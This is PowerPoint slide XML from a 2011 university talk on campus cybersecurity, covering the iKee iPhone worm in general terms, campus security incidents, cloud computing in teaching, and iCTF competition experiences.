              <a:t>Ashley Towns was subsequently offered a job by a leading Australian Software company, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Mogeneration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>11/18/2009</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Two weeks later new malware version with integrated http based C&amp;C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>from Lithuanian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>botnet master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8686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4495800"/>
            <a:ext cx="13700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 descr="4105473594_fc65efec5b_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208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617220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i="0"/>
              <a:t>Ehab Ashary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0"/>
              <a:t>CS691-Summer 2011 University of Colorado, Colorado Springs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27655" name="Picture 7" descr="bad-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3720306"/>
            <a:ext cx="1447800" cy="11191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62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 txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="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30723" name="Footer Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1447800"/>
            <a:ext cx="495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3300413" cy="8255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Installation Logic of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>iKee.B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> (duh)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0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3352800" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>A randomly generated ID for the bot client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Installs the preference files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Compresses all SMS message on the local iPhone into a single archive.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>changes the default SSH password from 'alpine' to a new fixed password value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8686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bad-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76813"/>
            <a:ext cx="1447800" cy="11191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4495800"/>
            <a:ext cx="13700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57200"/>
            <a:ext cx="57340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617220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i="0"/>
              <a:t>Ehab Ashary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0"/>
              <a:t>CS691-Summer 2011 University of Colorado, Colorado Springs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2812235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535531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cloud Computing: Public vs. Private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22313"/>
            <a:ext cx="8410575" cy="3213187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Early private cloud: VMware workstation/server for network/security classes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Expand VMware based server virtualization after AFOSR sponsored NISSSC-EAS “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> data center” was established 2009.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>VMware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Labmanager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> for configuring set of virtual machines as a unit </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>network security classes for secure site exercise (7 VMs with DMZ firewall).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Start using Amazon AWS EC2 2009 in Web system/cluster class </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Explore the use AWS EC2 for delivering MEIA in India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 descr="C:\work\cucs\chow\picture\appleIphone\800AAAAA\IMG_0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4354"/>
            <a:ext cx="4121516" cy="30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work\cucs\chow\picture\appleIphone\800AAAAA\IMG_0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16" y="3484354"/>
            <a:ext cx="2258306" cy="30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048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535531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Issues in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09613"/>
            <a:ext cx="8410575" cy="2751522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>atch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>4/7/11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Cloud Security Panel video at NIST </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>AWS allows command line interface to create/manage virtual machines (AMI instances)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Require the use of access keys when submit request with these command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Challenges: Enable students to sharing the access keys without revealing them.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1" y="3355974"/>
            <a:ext cx="6618289" cy="339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041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Amazon Virtual Private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25513"/>
            <a:ext cx="8572500" cy="4745915"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Amazon Virtual Private Cloud (Amazon VPC) lets you provision a private, isolated section of the Amazon Web Services (AWS) Cloud where you can launch AWS resources in a virtual network that you define.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With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Amazon VPC, you can define a virtual network topology that closely resembles a traditional network that you might operate in your own datacenter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>
                <a:effectLst/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>ffload of sudden demand in your private cloud.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFCCCC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Compromised VPC can access your private cloud</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFCC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63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978729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>New Initiatives in Supporting Integrated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2160591"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many companies are creating/selling tools for managing integrated cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>BoxGrinder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> is a set of tools used for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>building/deploying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>appliances (virtual machines) for various platforms (KVM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Xen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, VMware, EC2).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BoxGrinder Bu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3536950"/>
            <a:ext cx="8659451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282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978729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CyberWar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Competition Experiences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823913"/>
            <a:ext cx="8410575" cy="5983176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>UCSB International Capture The Flag (also known as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>) is a distributed, wide-area security exercise, whose goal is to test the security skills of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>participants.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>rganized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>by Prof. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Giovanni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:effectLst/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>UCSB.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>First Friday of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>December. 9 hours </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>torture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/exciting game including challenge/puzzle solving (coding, cryptography, stenography).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> 2003-2007 goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>maintain services of a site  written in C, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, python, ruby, java, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>haskell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> (some do not have source code, need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>decompiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>exploit vulnerabilities of these service on other team’s site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Theme: Robbing the Bank, MAFIA  (RIAA lawsuit).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 2008: attack multi-layer terrorist network and defuse bomb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 2009: create botnet and compromise browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 2010: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Lityaleak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>: attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Litya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> infrastructure (72 teams)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Required campus to open a VPN connection to UCSB.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Teams not allow to attack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22485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38213"/>
            <a:ext cx="8410575" cy="8623899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cademic Playground and Security Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Review of Security Incidents at UCCS/EAS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hacking Midterm for Profit and Fun</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hijack  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iCTFwiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for page rank promotion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSL Security Breach while online final is on</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security issues in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UCCSClassApp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ipad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> app) and Studentfootprint.com portal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security in Cloud Computing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The use of Amazon EC2 cloud for MEIA in India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Innerwall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CyberWar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Competition </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Experiences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41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iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Puzzles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7" y="752603"/>
            <a:ext cx="8410575" cy="1384995"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is my password? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What secret message the spy is trying to send in this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file?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7598"/>
            <a:ext cx="7816850" cy="422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25113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iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> puzzles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3" y="1333365"/>
            <a:ext cx="7596767" cy="43892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927100"/>
            <a:ext cx="73152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last word contained in this message?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500" y="5854700"/>
            <a:ext cx="67310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in http://athena.uccs.edu/ictf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2164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iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2011 and related Cyber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3970318"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This year’s  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 12/2  Friday.  You are welcome to observe at UCCS.  Email me cchow@uccs.edu or Dr. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Chuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Yue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cyue@uccs.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Greg organized a cyber student club. You may consider start one in your campus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Front Range Information Security Colloquium, January (AFA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CANVAS April (CSU-AFA)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1470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Security Education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7" y="823913"/>
            <a:ext cx="8410575" cy="1514261"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ph.D. Engineering in Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Master Engineering in Information Assurance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" y="1852613"/>
            <a:ext cx="8875713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8371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1772793"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shared my security mistakes, observed cyber incidents, and potential future threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thank </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>you for your critical services to the campus community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09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4325"/>
            <a:ext cx="8382000" cy="535531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reality in Academic Playground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5059847"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Certain facts about the perception of  Faculty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Like to provide ideal academic playground (computing, server, and network environment)  for students to learn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s close to real word as possible, e.g., using real IP/DNS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As secure as possible (even though it is secondary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>; they do not  want to be hacked, spend time to re-install/reconfigure)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Certain facts about the capabilities and experiences of most faculty members.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very few install systems or packages of their servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most of them did not keep up with software updates/patches; they are very busy persons;  some graduate students inexperienced; you know well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383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Security in Academic Playground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9313"/>
            <a:ext cx="8410575" cy="6795707"/>
          </a:xfrm>
